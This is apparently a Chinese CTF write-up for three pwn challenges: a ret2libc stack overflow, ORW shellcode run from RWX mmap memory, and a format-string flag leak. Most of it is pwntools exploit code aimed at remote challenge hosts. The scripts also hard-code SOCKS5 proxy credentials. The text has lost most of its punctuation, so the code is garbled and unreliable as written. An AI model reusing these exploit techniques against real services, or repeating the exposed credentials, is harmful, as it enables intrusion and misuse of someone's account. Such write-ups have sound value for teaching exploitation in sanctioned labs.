先用ida看看普通的菜单题第一个这个比较的是字符的1234所以输字符输入2有栈溢出打ret2libc即可。exp如下#!/usr/bin/env python3from pwn import *import sysfrom ctypes import *#from pwncli import *import socks# cli_script()#from ae64 import AE64#from pymao import *context.log_leveldebugcontext.archamd64elfELF(./pwn)libc ELF(./libc.so.6)# libc1cdll.LoadLibrary(./libc.so.6)li./libc.so.6socks.set_default_proxy(socks.SOCKS5,81.dart.ccsssc.com,25790,username1nkvap1o,passwordcl330rd,rdnsTrue)socket.socket socks.socksocketflag 1if flag:p remote(xt.xl-lab.top,33662)else:p process(./pwn)sa lambda s,n : p.sendafter(s,n)sla lambda s,n : p.sendlineafter(s,n)sl lambda s : p.sendline(s)slr lambda s : p.sendline(str(s))sd lambda s : p.send(s)sdr lambda s : p.send(str(s))rc lambda n : p.recv(n)ru lambda s : p.recvuntil(s)ti lambda : p.interactive()rcl lambda : p.recvline()leak lambda name,addr :log.success(name---hex(addr))u6 lambda a : u64(rc(a).ljust(8,b\x00).strip())i6 lambda a : int(a,16)def csu():payp64(0)p64(0)p64(1)return paydef ph(s):print(hex(s))def dbg():# context.terminal [tmux, splitw, -h]gdb.attach(p)#maybe gdbscriptset debug-file-directory ./starpause()rdi0x40129aback0x40136Fret0x401410puelf.sym[puts]putself.got[puts]sdr(2)pay0x58*bbflat(rdi,puts,pu,back)sd(pay)ru(b\x1B[32m发送完毕。.encode()b\x1B[0m\n)libcbaseu6(6)-libc.sym[puts]sylibcbaselibc.sym[system]binshlibcbasenext(libc.search(b/bin/sh))pay0x58*bbflat(ret,rdi,binsh,sy)sd(pay)ph(libcbase)ti()异步逃逸这里ida没识别出来这个mmap64看汇编相当于这个mmap64(0,0x2000,7,0x22,0xffffffff,0)。简单来说就是分配了一段可读可写可执行的大小为0x2000的内存(第三个参数权限是7)后面就简单了往v4写shellcode然后跳转过去执行shellcode没任何限制。沙箱允许ORW直接shellcraft生成就行了。exp如下#!/usr/bin/env python3from pwn import *import sysfrom ctypes import *#from pwncli import *import socks# cli_script()#from ae64 import AE64#from pymao import *context.log_leveldebugcontext.archamd64elfELF(./pwn)socks.set_default_proxy(socks.SOCKS5,81.dart.ccsssc.com,25790,username1nkvap1o,passwordcl330rd,rdnsTrue)socket.socket socks.socksocketflag 1if flag:p remote(xt.xl-lab.top,33583)else:p process(./pwn)sa lambda s,n : p.sendafter(s,n)sla lambda s,n : p.sendlineafter(s,n)sl lambda s : p.sendline(s)slr lambda s : p.sendline(str(s))sd lambda s : p.send(s)sdr lambda s : p.send(str(s))rc lambda n : p.recv(n)ru lambda s : p.recvuntil(s)ti lambda : p.interactive()rcl lambda : p.recvline()leak lambda name,addr :log.success(name---hex(addr))u6 lambda a : u64(rc(a).ljust(8,b\x00).strip())i6 lambda a : int(a,16)def csu():payp64(0)p64(0)p64(1)return paydef ph(s):print(hex(s))def dbg():# context.terminal [tmux, splitw, -h]gdb.attach(p)#maybe gdbscriptset debug-file-directory ./starpause()payasm(shellcraft.open(b./flag,0))asm(shellcraft.read(3,0x4AD2BC,0x100))asm(shellcraft.write(1,0x4AD2BC,0x100))sd(pay)ti()蜜雪冰城前面的没啥意思不看了直接看漏洞点这里首先把flag写到栈上了然后有格式化字符串漏洞看后面可以知道是在会员的积分那里有格式化字符串漏洞。直接%p读出来flag的信息再用cyberchef的大端转化成小端和hex转字符串就可以读出来flag了。就演示第一段吧虽然是web但漏洞还是一样的。从%8$p一直读到13就可以了